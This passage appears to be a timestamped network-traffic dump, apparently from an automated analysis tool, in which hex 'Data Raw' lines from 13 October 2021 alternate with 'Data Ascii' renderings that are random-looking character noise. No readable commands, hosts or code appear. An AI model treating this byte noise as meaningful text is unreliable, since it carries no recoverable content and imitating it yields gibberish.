                                Data Ascii: 8HPCLEA;*qCf7#xs.F[nv]~;\<[jHT_UE59n**AkT^BzttVW6c7qmbP71! N{ad Y)D Z^"lWY,!\i\CO,NVz/0mY{!"8
                                2021-10-13 14:54:49 UTC136INData Raw: ad 5b bd 9e 9e 39 87 0b c2 a5 98 48 fc 54 fe 8a 98 9e 1f 98 d2 15 97 19 1b ad 9b f1 d4 bd 06 8a 6b 60 0e ef 12 b9 86 28 fc e9 9a 8f 0b e2 d2 a0 64 24 82 c6 7c 74 d4 87 f7 60 47 7c 99 a5 ad a9 62 cb 31 5b 5c 50 be 3c 12 1d 60 a2 ce 08 fd 2d 39 0f 95 22 dd d0 98 3d d1 8f 35 ac b0 37 ae 52 f1 e6 7a 00 b3 71 96 5e b7 97 52 19 85 38 56 95 98 52 0b d8 2a a4 9f 26 ab 69 55 a1 25 be d5 9c d4 a9 9f d9 a9 30 0f b5 f9 1f 7f a6 27 42 45 fa d0 65 d1 62 9a a9 66 3e 85 d7 3b c0 6b 3c ba 95 fb e9 75 ee 9d f8 da bb b0 23 97 8d 8d 8b 4d 48 68 e8 1b 12 93 64 52 15 e4 a5 dc 57 fc 52 37 2b 29 eb 10 27 39 4a 78 7f 1a 86 a0 1e 87 c6 90 6d 56 95 cc f8 79 86 b4 a7 65 e4 d5 ab 97 62 19 18 9c 5e e5 41 d4 f5 07 35 0a 91 e5 0a e7 e1 d3 cf 65 d0 9c d8 9f 5a 1c 99 9d f4 63 49 15 08 ef
                                Data Ascii: [9HTk`(d$|t`G|b1[\P<`-9"=57Rzq^R8VR*&iU%0'BEebf>;k<u#MHhdRWR7+)'9JxmVyeb^A5eZcI
                                2021-10-13 14:54:49 UTC137INData Raw: d1 df 8d 80 c9 74 85 de 87 a2 26 ce 3e 5c 8d 8d f3 a0 9f 9d d3 84 20 82 25 0a fc d9 b8 43 24 22 36 ea cc 1d 8e 71 f1 32 3f cb 87 74 d3 30 42 b8 78 b0 b3 30 fb f7 01 f0 56 9f ff 2c 19 ba 88 d0 02 91 cc 39 b2 97 2c 7f 87 7b b5 f7 79 fc ff ad c9 cc 84 af 16 98 17 0f 4a 32 ef 06 61 a2 31 cd 13 bb 3e 86 e0 22 a8 7f 65 f8 33 9c e5 19 11 15 65 44 da b1 30 d3 ff 50 1b de 42 e4 40 27 10 f6 46 24 58 b1 59 58 00 bc b5 c6 27 20 f8 f2 d4 59 05 a8 0c 16 dc 84 e7 f2 1a 22 c7 58 a7 a1 13 7a 9f 67 76 0d 77 bb 6c 16 b8 89 80 23 f8 8a 5a e0 52 06 3d 52 03 ca 66 87 3c 7b 9b 7e 03 d4 d6 51 31 b6 44 dd 86 59 8f 15 a0 0f 61 07 37 f2 23 2f c6 41 73 22 2c 56 9d cf 11 1f a6 95 e7 91 3a a9 7c 7c db ee 4a 5f 25 3c c0 89 a5 f6 30 5e 35 4c b9 be 04 f1 ca d5 5d 71 78 5d 0a e5 d9 58 34
                                Data Ascii: t&>\ %C$"6q2?t0Bx0V,9,{yJ2a1>"e3eD0PB@'F$XYX' Y"Xzgvwl#ZR=Rf<{~Q1DYa7#/As",V:||J_%<0^5L]qx]X4
                                2021-10-13 14:54:49 UTC139INData Raw: e8 18 d2 f2 8a 75 97 24 c9 d1 c7 c4 e6 2b 40 4c c1 f5 e2 cd 12 b4 1b 64 d9 e8 2b 51 fe c0 43 f9 39 2d f3 4b ec 7e 8f d1 98 a5 c0 7f 5d f6 7b f2 c2 00 48 95 f0 ff 6b a1 a1 0c ea 2b 57 e6 07 3f 9e 6d d1 12 37 99 13 54 11 65 fc 4f d6 38 64 3a 20 47 4a ce 7c 8a 03 cc a1 66 87 eb d5 33 e6 5c d1 af d5 0f 06 bd b5 2e d4 a8 54 f8 fe 46 5a e4 16 b3 8d 87 3d 67 51 4f a8 2a 3a bf f1 0f 99 88 b1 56 57 34 3b 8c c2 e9 9e 0e b0 b4 e8 d5 48 7b de 28 c2 8e c3 58 de 4f c1 5c 91 c8 76 9f 31 86 43 4b ee 21 b9 a2 43 7b 71 42 3c ba a3 27 55 a9 f2 69 ae 00 5a 18 85 97 fc 77 1c 84 b2 24 92 5f 8f 06 13 cb 0a c7 ff 63 8f c6 af 4c 0c 9c 8e c0 97 0c cf 8e e2 9a ef ce 43 61 d8 96 7c e6 87 c9 da c4 29 eb 15 04 aa 4a ca cd cd ae a2 9b 55 1b 4b d2 30 49 a2 48 58 ab 64 5e 9f 21 32 d7 1e
                                Data Ascii: u$+@Ld+QC9-K~]{Hk+W?m7TeO8d: GJ|f3\.TFZ=gQO*:VW4;H{(XO\v1CK!C{qB<'UiZw$_cLCa|)JUK0IHXd^!2
                                2021-10-13 14:54:49 UTC140INData Raw: 25 be 78 8d 37 96 18 e0 3a a3 26 d7 a3 67 23 fd 54 64 8f 32 99 39 b8 17 3c ba 1b 3b 9c aa 73 aa 3b 17 a2 42 42 65 e8 38 3f 62 94 d0 f8 b8 8f 80 e2 d2 a0 de 8a ba d4 5a 4e 1c ab f5 60 61 11 00 db 34 b7 41 e7 3c 35 5d 56 94 24 49 a9 70 84 ea 44 1d 2c 39 2f 80 12 f0 c1 a5 35 1d 8c 35 aa ba db cb cb f0 ff 56 0d dc 70 90 74 af cc e6 0a a3 1c 1b 76 99 52 2b d6 1a 89 8e 1f 80 a3 79 a3 25 98 92 01 aa 30 83 f1 80 12 61 b2 d3 99 9b 1a 0b 50 67 fa 5d 65 d1 62 20 13 5e 2c a3 e8 d4 e9 46 3e 9a e7 ca 6f 0b 68 89 d0 f3 99 df 24 bd 0b 69 37 61 5a 4a e8 90 12 93 64 e8 9b dc b7 fa 68 38 7b 1a 29 09 64 21 a1 47 cc 70 57 33 a4 d0 19 ad 40 74 d1 7a 87 ee f8 ec 86 b4 a7 df 0a ed b9 b1 5d f1 31 b1 5c c5 d5 e5 73 79 b3 01 b9 cc 28 96 e6 f9 49 81 6c b0 ca bd 5a 8b 99 9d f4 d9 b4
                                Data Ascii: %x7:&g#Td29<;s;BBe8?bZN`a4A<5]V$IpD,9/55VptvR+y%0aPg]eb ^,F>oh$i7aZJdh8{)d!GpW3@tz]1\sy(IlZ
                                2021-10-13 14:54:49 UTC141INData Raw: 2e e5 50 fc db a7 00 9d 6b fa 47 82 82 24 ec af 5d 17 a8 44 97 94 af f3 a6 b1 83 05 f8 c0 09 af 5c 28 15 15 c0 e1 19 a4 f1 a5 2d 40 52 82 54 d0 12 d0 b9 e2 95 04 07 f0 c5 20 d2 c4 9e df d2 25 64 9f cf 14 a6 ed 13 9f 93 06 fb d3 60 ca 6e 7c dc f3 8f 5a cd 1e 8a a1 ac 1c 3e 64 10 7c 07 41 b6 0c 27 04 a5 16 b2 ca 0f ac 55 e5 ac 28 e3 7c 1c 31 18 47 d0 db 2b 15 64 c8 5b 2a f1 60 70 41 07 0c cb ab 33 47 ba 6a 5d 2f be b3 ea 8b dc 1f 6a d5 5d 21 82 9b 17 dc 1e 58 fa 25 15 c1 72 30 a0 13 5a 98 88 61 0d 68 aa 6c 16 b8 89 80 23 fc 8a 5a e0 52 06 3d cf 00 ca 66 87 3c 7b 98 7e 03 49 d5 51 31 b6 8e d7 86 59 8a 30 a5 20 63 01 1b 5e db c8 5e 40 77 06 9b 5b 9f cf 8b a0 ae aa d3 97 8d a4 7e 7c fb 33 1d 42 25 23 cf af a0 d9 32 58 19 e0 41 59 9c f0 ce f1 e5 7d 7a 5d 90 5a
                                Data Ascii: .PkG$]D\(-@RT %d`n|Z>d|A'U(|1G+d[*`pA3Gj]/j]!X%r0Zahl#ZR=f<{~IQ1Y0 c^^@w[~|3B%#2XAY}z]Z
                                2021-10-13 14:54:49 UTC143INData Raw: ab 93 4f e0 a7 f0 f2 8c 44 3d 77 52 d0 c1 ea 40 ed d8 4d c1 6b e7 cd 01 92 3b 46 fd c5 39 57 b9 f4 41 f9 25 25 49 69 ec 78 ba 5e ce 11 c3 7f 5f fc 44 8d 5b 01 d2 b4 fd c0 4f 81 18 97 cf 06 65 ad 3e 11 9c 70 f9 1f 91 b9 15 7e 8c 16 4d 63 d4 3c 42 aa a7 39 d3 55 59 a3 32 c5 83 dc 86 71 f0 3e 80 63 f1 80 cb 27 2b 9f 04 08 fe 2a 35 6c d7 6b 5c c4 ab 98 0b f9 3e 43 7c 5a ae 3a 83 be f1 95 9c df ba 70 77 19 11 a1 c0 c9 26 04 36 ca 6e d9 60 52 fc 94 c5 a4 45 bc 62 63 d3 7e 91 45 75 9f 31 3c e7 7f fc 07 86 8b 69 56 73 62 f1 b0 21 59 d3 a3 da 40 8c bd 5d 32 07 73 40 5b 0d a6 b2 ab 91 5f 8f bc af ff 1b e1 c2 79 a0 c4 af 6a f0 3e f0 59 8b 24 e6 ac 5c 9d c5 48 a7 dd f4 87 5e e6 0a ca da c4 93 6e 21 16 8c 76 d1 e2 cf ae 84 6c f3 65 d2 cc 01 65 af f5 59 ad 4e 42 c4 95
                                Data Ascii: OD=wR@Mk;F9WA%%Iix^_D[Oe>p~Mc<B9UY2q>c'+*5lk\>C|Z:pw&6n`REbc~Eu1<iVsb!Y@]2s@[_yj>Y$\H^n!vleeYNB
                                2021-10-13 14:54:49 UTC144INData Raw: 76 1e 71 1f b5 5a de 33 bc 9e be 83 81 26 d3 9c a0 0a d0 56 fe ac 35 0d 61 01 c9 3d be 3b 4f a9 b1 73 30 01 2a 98 49 60 31 ec 12 b9 3c 35 f2 f8 bc b0 74 cb ff a2 44 a9 bd 44 02 f7 fd aa f1 40 14 54 1b db ae 8d 4f de 37 17 08 52 be a6 17 7c 52 84 ee 7a d4 00 3b 2f 1c 1d 5b ae 1a 14 fc 89 15 fc 98 b1 d0 51 d5 cb 6c 06 fe 26 94 5e 2d 92 2b 28 a3 18 24 8c b0 7f 29 4c 39 8e 19 47 39 40 78 a7 05 ef fd 1a aa aa bb f4 bf 36 41 e3 fb 1f e5 a3 66 73 63 da a1 74 f9 4f b8 36 75 14 03 b6 ae e9 46 3a 9a cb d3 6f 0b ed b9 d5 cc bd ff 7a 95 8d 17 8e 1c 79 4e c8 6b 0b bb 49 70 be f7 8f 5a 36 45 7b 1a 2d 09 b4 38 a1 47 49 5c 52 0c 80 f0 46 85 c6 0a 68 ef a4 ea d8 16 88 9c 8a 47 2f c6 81 15 03 8d 31 b1 58 c5 1d fc 73 79 36 2e bc f0 0c b6 ba d1 cf ff d5 12 e9 b9 7a 73 b0 b0
                                Data Ascii: vqZ3&V5a=;Os0*I`1<5tDD@TO7R|Rz;/[Ql&^-+($)L9G9@x6AfsctO6uF:ozyNkIpZ6E{-8GI\RFhG/1Xsy6.zs
                                2021-10-13 14:54:49 UTC145INData Raw: 07 69 d9 06 cc 72 86 df 8d 86 79 d7 d6 55 a0 82 58 ec af 5d ad e5 4c 85 b2 90 d4 8c 9c 81 25 0c f6 8f d1 da 25 3d 3c e2 9a 1d 8e 77 41 91 6c 40 a0 54 ac 12 d0 b9 58 39 0c 15 d6 fa 0f f8 e9 9c ff 2a 13 e6 e1 49 03 8e c4 31 e3 97 2c 79 37 dc e6 7f 5e dc 87 8f 5a cd a4 1e a9 bd 3a 09 44 3f 7e 07 67 88 93 59 9d ba 3e 9b e8 72 a8 7f 63 48 94 cf 6d 3e 31 6c 47 d0 db 91 82 6c da 7d 1d d0 4f 72 41 21 3a 50 d5 aa 59 b1 46 50 53 bc b5 c0 97 87 ab 79 f3 79 7f 8a 99 17 fc 37 58 d7 37 2c ee 50 1f a2 13 7c 95 13 1f 94 76 a6 40 1b c5 8b 86 09 e0 d1 ee f3 74 22 62 c6 02 ca 46 df 3c 56 8a 47 2d 6a fa 53 31 90 97 4c f8 c0 94 3d 89 2d e1 03 1d 74 c7 93 ea 53 51 22 3b 55 9d cf ab ea ae 87 c1 ae b1 80 51 7e fb 15 77 d9 5b ba d1 a1 8c d4 b1 5a 1f ca 5d 02 28 e3 e8 d5 44 72 78
                                Data Ascii: iryUX]L%%=<wAl@TX9*I1,y7^Z:D?~gY>rcHm>1lGl}OrA!:PYFPSyy7X7,P|v@t"bF<VG-jS1L=-tSQ";UQ~w[Z](Drx
                                2021-10-13 14:54:49 UTC146INData Raw: 08 eb 21 08 91 4f c0 af f5 df 9d 79 35 fb 52 d0 c7 e0 2e b5 41 4c da 47 ea e2 03 94 11 5a a6 71 2a 71 9d f9 e1 fb 25 05 44 6c c1 6a 83 73 44 3e c1 7f 79 3b e4 f3 c2 1f f1 98 f0 ec 4d 87 32 8b 94 b2 76 8b 1a 1f 3d 72 f9 3f af bc 38 6c b5 3b c6 4c d6 3c 64 90 06 47 4a 4b 52 8f 3f e8 81 da ac 6d ab 8a 93 45 d5 8f 6d 25 2b bf 2f 0d d3 38 0c 41 5b 44 5e c4 8d a9 aa 87 a7 5d 65 76 a3 08 81 b8 db 8d c7 6b a9 56 53 09 b6 a3 c0 e9 02 01 1b db 57 f4 ed 7d fe 94 e3 ba e4 c2 fb 7b fb 57 b3 74 71 b5 b7 d8 5b 53 ee 25 86 1c 69 56 73 d8 1f bd 33 7f ec 0e f0 6d 8e 9d 6c 3f 85 0d c6 4b 25 8f 90 99 95 75 09 58 13 d3 0a c3 c2 ec a0 c4 af d0 03 33 e2 7f b6 ab c9 ae 5c bb a7 e9 d9 44 ea 8e 72 eb 3b c8 dc ee 8b 35 95 05 aa 52 c2 48 cd ae a4 2b f6 48 c3 f5 10 e5 80 f7 59 8b 35
                                Data Ascii: !Oy5R.ALGZq*q%DljsD>y;M2v=r?8l;L<dGJKR?mEm%+/8A[D^]evkVSW}{Wtq[S%iVs3ml?K%uX3\Dr;5RH+HY5
                                2021-10-13 14:54:49 UTC148INData Raw: 4a 14 30 6e 45 c5 0c 93 7e ad f9 be 9e 9e 39 87 0b c2 a5 98 ea ff 54 fe 8a e5 a2 1f 98 d6 15 97 19 1b ad 9b f1 d4 bd 06 8a 6b 60 ac ec 12 b9 86 28 fc e9 9a 8f a9 e1 d2 a0 64 ad bd c6 7c 72 d4 87 f7 60 47 7c 9d a5 ad a9 62 cb 31 fd 5f 50 be 3c 12 1d 63 a2 ce ae fe 2d 39 0f 12 1d dd d0 9c 1c d4 a0 37 aa 9c 9b 56 b5 69 e7 7e 24 fe bb 94 5e 2d 28 5a 26 b1 3e 1b 5f 9a 52 2b 6c 2e 8e 9f 39 bf 7f 50 8e 27 b8 f9 30 2c 4e 07 d8 ad 14 41 78 fb 1f e5 19 2f 7d 71 fc 9e a8 d3 62 ba 16 3c 14 85 c8 28 c2 6e 13 b8 93 d7 45 89 09 05 f9 de 9f ff ef 95 8d 17 34 45 77 5f ee 54 de 91 64 72 9e 88 8f dc 48 c6 52 37 2b 29 eb 10 23 39 4a 78 7f 1a 86 1e 1d 87 c6 90 6d 56 96 cc f8 c7 85 b4 a7 65 52 ea ab 97 60 3c 1d b3 5c e3 6d 78 0d e0 ad 0b 95 c1 e5 94 e0 d3 55 da d8 a3 ec 99 b5
                                Data Ascii: J0nE~9Tk`(d|r`G|b1_P<c-97Vi~$^-(Z&>_R+l.9P'0,NAx/}qb<(nE4Ew_TdrHR7+)#9JxmVeR`<\mxU
                                2021-10-13 14:54:49 UTC149INData Raw: c7 12 9b 79 ec f0 2b ca 52 fa f7 0f f8 7a f3 fb 43 a6 4d 20 ee af c7 a8 a0 78 a3 92 60 f7 a4 b1 a3 19 26 dc 09 b2 6b 09 3f 38 c4 cb 9d f0 ee da b4 45 72 76 76 d7 10 4a 9c 55 a1 0f 35 26 e7 27 d0 e4 dd d3 2c 39 7a b7 fd 00 8e c6 3b 1d eb b5 78 ad fd eb 9f 7a fc fb 17 7f e0 95 89 ac 4c 38 1e 6c 32 37 2b 61 a2 09 0f 29 b9 3e 99 e2 8d d4 e6 62 d2 b5 c2 8e 1a 11 11 df f5 f6 a0 16 69 28 7f 0a f8 42 3d 6d 27 10 cd 83 1e 5a b1 44 5a af c0 2c c1 0d a6 a6 98 d7 59 01 12 bc 3a cd a2 5d 24 35 33 e1 58 60 8c 13 7a a4 bd 4c 0f 77 a0 6e bd c4 10 87 09 7e d4 37 e3 52 02 87 e1 2f d8 40 3d ed 54 8a 58 03 15 fb 51 31 89 b7 e2 ab 5b 95 3b a7 8f 1f 98 1c 74 59 96 32 43 77 02 21 72 b0 de ad 1a 7e 85 c1 b1 8d c9 50 7c fb 0a 75 72 27 23 d6 8b 0a 8a a9 59 1f ce e7 d1 07 f1 ce 6f
                                Data Ascii: y+RzCM x`&k?8ErvvJU5&',9z;xzL8l27+a)>bi(B=m'ZDZ,Y:]$53X`zLwn~7R/@=TXQ1[;tY2Cw!r~P|ur'#Yo
                                2021-10-13 14:54:49 UTC150INData Raw: 43 91 8d 1d ef 01 a8 13 d6 c1 35 d4 d2 4a 71 15 5a dd fb c7 c0 c7 b6 91 db c0 6f c3 c8 f1 90 3b d6 58 70 2a 71 9d cf 49 d2 3e 7b 46 48 ec 7c a3 2d 7e 3d c1 7b 5f 47 c4 92 e2 aa d2 b0 dd 8f 9f 1d 1e 1a b2 21 71 f5 86 3e 9e 74 77 56 cb 9d 38 a7 b9 1b 65 4e 4e a7 95 50 f6 91 cb b4 b6 29 d6 2f 07 33 6a 74 02 c5 10 8f 1c 69 0c e3 e0 53 48 d4 17 f9 fa 8b 3d 85 89 20 4e 62 72 79 19 a3 8e e1 34 e5 77 05 24 f6 4b 0e 55 bd 87 d1 ef 55 24 10 4d db c3 36 f5 56 ce f1 5d 14 4b 06 66 62 56 c2 40 e9 3d c5 ec 03 85 3a 52 ca 66 b4 17 21 fa ce eb dc a0 02 a6 fd 60 04 77 c7 3b 34 f8 af 24 8e 73 f2 ab 26 0d 11 06 ef 32 8b 39 7c b7 72 46 ba 24 61 12 f2 65 41 b1 06 dd 03 b7 f1 11 ce a6 8b 9a 11 92 ed 2e b3 44 b2 b0 b2 7a 38 75 72 df 37 f9 96 b7 d2 f8 ff 8b 3e 93 84 65 6d c1 a1
                                Data Ascii: C5JqZo;Xp*qI>{FH|-~={_G!q>twV8eNNP)/3jtiSH= Nbry4w$KUU$M6V]KfbV@=:Rf!`w;4$s&29|rF$aeA.Dz8ur7>em
                                2021-10-13 14:54:49 UTC151INData Raw: bb dc fa 50 1a 2b e0 3d 49 1c 95 6c 8d 17 85 94 86 ab b8 77 ec 83 a4 25 ff 47 fb 82 3f b2 31 a2 a1 37 94 23 37 aa 97 5d 9f 20 32 a1 5d 69 5b c4 08 82 2d 25 ce d8 80 88 42 d0 f7 a8 44 76 59 1c f5 84 32 72 39 81 8a 93 de 12 e7 4f af 10 ce e0 90 b2 54 69 ef f0 e2 70 3e a6 2a d6 fe c7 f8 cb 21 33 43 eb 13 66 c2 5f 76 6b 02 3c 10 0e c5 fc 26 9a 68 91 c0 55 98 f5 5b e5 ff 70 78 cc ae cd bd 16 23 a5 38 d7 f5 2a af 02 4d 8d 2a b8 45 65 35 9a ff 0b 6b 80 79 17 94 86 d0 5c 2a c9 75 c4 30 97 d1 9d 2c 65 a8 6c f5 99 1a 38 7a e9 85 dc 20 54 21 03 63 84 25 0b af 0e d6 e2 ff 8b 09 52 cc 2b 31 f6 b5 db aa 1b 98 2e 1d 49 6d a3 60 da 17 99 34 2a 4c d7 82 5b d7 9c 54 12 2f ca 93 bf 75 f9 e7 e8 21 59 b1 c2 f9 27 46 47 d1 34 de 1b 86 19 07 83 20 b3 d2 78 f5 99 b3 a8 8f ed e9
                                Data Ascii: P+=Ilw%G?17#7] 2]i[-%BDvY2r9OTip>*!3Cf_vk<&hU[px#8*M*Ee5ky\*u0,el8z T!c%R+1.Im`4*L[T/u!Y'FG4 x
                                2021-10-13 14:54:49 UTC153INData Raw: fd 4c 75 bb 30 94 61 fb ec 74 a8 78 de f1 ba f8 9e d2 d3 6d b7 d8 1a d9 9a 6c a0 ec 16 f4 d1 ef c6 93 d0 e1 52 9e 0c f6 6f 83 f6 ad ba 06 2d d1 5b ef 40 76 8b 86 49 ec 0d c1 03 6a b7 3f b8 86 57 63 f2 05 47 22 56 9a cb a9 51 0c dc 40 0c d2 55 6e 97 d2 4e 0c 3e 82 df 5e 02 7e a9 2b 37 5c 72 47 c2 f8 c4 da b4 df b8 2e 9f fd df 7b e3 59 5c 88 3f e9 bd 14 65 7c ea 88 9a d3 84 44 47 2f b5 9f 4e e6 93 5d db 85 aa ca ef 2a 04 90 ad 47 a1 88 cc 1e 11 68 a4 41 63 9a 6c ea b2 2e 74 fb 6b 3d c4 77 c2 7a a5 3c 74 fc 01 74 b1 87 72 4f 37 b6 55 3d a1 95 d1 50 31 b8 c7 e1 40 56 41 9a 47 c2 6d 4f 43 32 f5 70 49 23 b4 32 4e a9 9c e9 b7 6f f0 58 be 21 58 27 22 18 23 d8 a8 68 58 3d cc 2e e4 af a0 6c 86 80 c6 ab e2 a7 7e 72 f7 01 01 1b 61 77 85 b9 92 ba 7f 04 5e cd fe 10 3a
                                Data Ascii: Lu0atxmlRo-[@vIj?WcG"VQ@UnN>^~+7\rG.{Y\?e|DG/N]*GhAcl.tk=wz<ttrO7U=P1@VAGmOC2pI#2NoX!X'"#hX=.l~raw^:
                                2021-10-13 14:54:49 UTC154INData Raw: ec 97 d2 6f a9 68 7b c4 62 82 c9 11 98 95 56 77 28 fb f9 99 92 19 0d 05 14 7a 96 8d 16 b4 3f 30 c8 43 e9 05 39 1d f7 ae 4f 03 91 11 d3 e7 27 ae 08 93 76 8a 18 db 30 df 9c 31 31 16 1b a9 7f 18 07 18 a0 72 e8 fa 25 f8 8e 6f e6 c6 6e c6 47 a4 b9 05 da d6 1f 8d e7 f7 56 b4 c7 01 bc ee e3 fb c1 2b 88 36 35 5c 1a 75 66 97 04 c7 41 45 40 9d 8d 06 09 81 41 b4 a0 d3 57 e4 f0 75 05 34 03 2c 1b ee 83 c6 32 ac 33 2d 4f b6 02 68 12 0a 13 44 4a e6 8c e5 e5 74 7c 9c 31 91 16 7b 99 dc 97 c1 89 99 b6 1d 81 2b c1 2b 25 f8 57 b2 b5 2a 8a 5e dc d1 16 0e 1b 2e 5a f5 4e 2b 97 fd a6 35 e7 ca 35 75 ff 63 98 1d 6d d7 f1 af c0 2a ee 2d b4 f9 43 eb ff 48 b8 d5 a9 58 12 3b d5 4f 9c 01 c3 b3 57 b9 e5 f1 cb 4c cb 92 4f d9 2f df c0 e1 29 6a 20 39 cb 69 de ce e5 9a 80 b1 fd 53 f2 ef 04
                                Data Ascii: oh{bVw(z?0C9O'v011r%onGV+65\ufAE@AWu4,23-OhDJt|1{++%W*^.ZN+55ucm*-CHX;OWLO/)j 9iS
                                2021-10-13 14:54:49 UTC155INData Raw: e1 ee ca 04 55 7e c1 9a f0 31 ec 85 dd 40 80 59 f0 58 4c 59 79 5d df 38 6f 73 c1 14 b4 19 47 eb 7a d0 7b 29 d6 54 e9 f7 4b 6a 80 53 d4 f0 77 8b a1 a3 18 e5 47 97 81 5c 42 3b 24 fc 4f 45 37 cc 2b 1f 55 f1 e8 67 25 62 eb fa c5 82 4b a3 35 e6 77 a2 ef ec c1 13 08 ab 80 cf 2e 74 c8 52 9b 9c b2 9f 9f 74 78 36 a0 04 12 82 19 23 1f 5e 59 50 47 c4 92 56 e4 cc 05 69 fe 71 65 ff 45 75 de db 12 79 02 74 ef 85 51 ed 08 36 f3 6b f1 91 59 f6 74 dc 87 f5 0b 0e c7 94 4a aa fc 76 31 04 f9 fd 0a ba 15 cb 47 0c 57 c1 81 5b 92 3c 46 da e5 af 1d 78 13 d4 86 d1 89 d4 23 98 8b 15 ed 72 55 47 da 66 5e bb 6e 6f ac e7 fc e6 56 d4 66 02 35 2c ee 22 b7 5f d1 5c 43 09 83 f1 37 a2 e5 3b 57 76 af cf ed 22 b1 81 9a 69 2a db 90 ac 45 1a 36 92 68 c1 30 ee 47 a7 66 e6 5c 28 e0 1a 0e 19 1e
                                Data Ascii: U~1@YXLYy]8osGz{)TKjSwG\B;$OE7+Ug%bK5w.tRtx6#^YPGViqeEuytQ6kYtJv1GW[<Fx#rUGf^noVf5,"_\C7;Wv"i*E6h0Gf\(
                                2021-10-13 14:54:49 UTC157INData Raw: 74 ba 05 6a e2 cd 1c d8 73 98 2b 2e e6 3f a6 10 21 33 45 39 06 05 b1 4c 5a d8 15 5a 94 15 03 e2 09 32 14 6a 2c 21 16 a0 99 49 c0 33 cb b2 fa 93 5e 6d 96 17 f8 17 7b f9 cc 03 f7 1d d9 35 3a df 0a 93 e4 20 14 b5 7c 76 2b 07 d7 d2 f1 2a 79 ae 69 22 9b 30 2d 8c 94 41 07 48 ca c9 5b ef 9a 22 85 d9 f3 80 f5 76 5e 23 57 33 4e 22 ba 09 7e 5d f1 65 96 c0 10 a6 70 7c b3 e6 a6 3b 13 27 4a 2c aa a6 80 7a 2d b4 1b 50 90 08 1b 24 71 45 8b e7 7d 07 fc 1b 31 63 e0 c4 a3 6f dc fc 5e ef 40 00 8a 85 01 dc b5 43 e3 3e 3c d4 5c 06 e5 5b 5d 9b bf 7a 01 78 b2 59 26 b9 b0 9f 0d 7a cf e8 c7 7f 1e 20 ee 3c c9 45 33 3c 47 b9 7d 0b 6e ee 41 0c b6 a5 fc b6 61 97 01 af 28 79 23 24 43 92 6f 5d da 82 fd 45 b3 69 2d 7f de 0d 6b 20 4d 37 5f 8b 86 04 f8 a8 ad d9 aa 40 32 45 73 f9 cf c8 16
                                Data Ascii: tjs+.?!3E9LZZ2j,!I3^m{5: |v+*yi"0-AH["v^#W3N"~]ep|;'J,z-P$qE}1co^@C><\[]zxY&z <E3<G}nAa(y#$Co]Ei-k M7_@2Es
                                2021-10-13 14:54:49 UTC158INData Raw: 45 82 95 7c 79 6c db 0d 9c 90 77 95 3d 0b f0 74 bc 53 35 2a db 9b 80 f4 68 5a 5c 55 1b dd cb 1f dd 77 59 8d 1d 8b 17 10 21 b1 d6 30 56 e0 4e ad 8f 5d d7 77 fe 2a da 6c a0 51 f4 da 5e 43 65 40 8d 57 08 6f 4f 10 cb 42 41 98 56 32 cb 7d 6e ca 22 83 5a 23 e0 7c 20 df 56 32 1f 8d 72 32 d2 65 17 38 0a 1f d4 77 8d ed b0 fa ca b5 6d e4 1a 9c cf a6 4c 4d d5 d7 1d 8f 5d 5d 3f 80 38 23 a2 d3 d7 c8 dd e7 07 45 50 94 15 8a a3 d0 03 b2 fd 89 53 55 3c 12 b7 c9 c2 81 2e 3b e2 69 eb 5f 6f e5 9c 94 a5 e3 c5 d8 45 f7 5a 9e 55 67 a7 00 80 f0 60 f4 01 8e 90 53 6c 47 47 05 ac 1e 6b eb 95 d6 4f f6 8e 6e 39 6e c5 12 9c d6 63 4a 47 65 8e 46 eb 40 1c cf 0c 0b 9f 7c 09 66 94 e8 c6 1e a7 4f de 0f 76 9b 41 03 31 0d 82 1d 6e bf 28 de 17 6b 70 a1 fc d4 ce 45 b9 16 16 3e 5a 64 7c 33 99
                                Data Ascii: E|ylw=tS5*hZ\UwY!0VN]w*lQ^Ce@WoOBAV2}n"Z#| V2r2e8wmLM]]?8#EPSU<.;i_oEZUg`SlGGkOn9ncJGeF@|fOvA1n(kpE>Zd|3
                                2021-10-13 14:54:49 UTC159INData Raw: 74 58 55 ea f1 d8 02 42 60 e0 b1 87 7e 99 e3 93 14 f7 1e ae 14 2e 2b 06 11 b0 75 34 0e 8f 49 fe 43 22 a9 32 b5 05 75 81 12 99 a5 18 0c 2d d7 42 6d 84 03 03 26 b8 43 f6 51 7b 97 af ea e2 34 a9 8f dd 14 fd de 86 20 32 9d fd b1 27 03 33 62 b7 69 cf 0a a6 6e 63 10 13 ec cf 56 40 03 ff 87 19 b9 67 4f 54 62 57 98 8e d1 5f b8 fc 52 b6 94 ab ed d7 f6 e7 46 2e c9 62 96 6e 04 95 4a 03 b7 07 30 8b 8a 68 3f 52 29 a7 c6 37 ef 03 24 b5 1b 86 d8 37 c5 1e a5 f9 8f 0c 75 9e ca 29 c1 8f 1f 4b 66 f1 8d 4c fe 51 9f 08 41 46 bb f2 0b 32 8c e5 60 4a 1a b3 c7 a6 4c 2f 1b 0f 28 f4 5d 50 de 77 b4 a2 98 18 ac d2 7c 81 af 7c 34 70 3f 8c 14 ae e6 cb d2 13 d6 55 aa 30 d6 90 f7 4b 58 8f 40 3b de f6 a7 77 1e 2f f4 63 0b 55 be d7 30 0c 5c d6 91 b7 3b de 7c f9 7c f0 fb 25 99 1b 70 a3 43
                                Data Ascii: tXUB`~.+u4IC"2u-Bm&CQ{4 2'3bincV@gOTbW_RF.bnJ0h?R)7$7u)KfLQAF2`JL/(]Pw||4p?U0KX@;w/cU0\;||%pC
                                2021-10-13 14:54:49 UTC160INData Raw: 37 42 ea 1d c0 6e 11 b1 9d 0f d0 77 94 07 4e b8 7d cb 4d 5a 2c de ad bb bf 20 cd cf 79 a3 e5 19 e8 c2 3d ca c0 c7 a7 e8 ed ce 3a 07 ec 31 d0 1c 72 2b 61 99 a0 7c e6 1a f2 c9 3a 3a e4 03 a0 1d db fb 10 c6 41 6e a3 89 7d af b5 e1 87 52 4f 10 cc bf 46 ee b4 09 80 88 35 37 f3 98 ac 4f 74 f2 ee 99 52 c5 b1 ba 85 b1 63 59 23 5b 30 78 18 91 0f 3e 18 a6 2e 94 f6 33 8b 54 42 ea 95 c3 5e 2c 39 38 6c b4 af e6 61 63 f6 4d 34 d7 5b 43 77 1a 2e ee dc 56 00 11 ac a0 f0 5f 48 3c cf 72 51 eb 15 8a d2 43 31 a7 0f 5d b7 01 ed eb 3f a5 ef 64 d0 a3 64 51 b5 f4 8f 59 a2 c7 51 25 2e e3 98 07 2a 42 d8 8c dc 3f ed 33 bb ea f4 af 74 be df a0 3f e7 83 76 47 52 09 d8 0e f6 3e a5 ed 97 9f c8 e8 3f 52 a8 98 bf 25 c0 2d 61 32 af 1a 10 12 64 28 31 f9 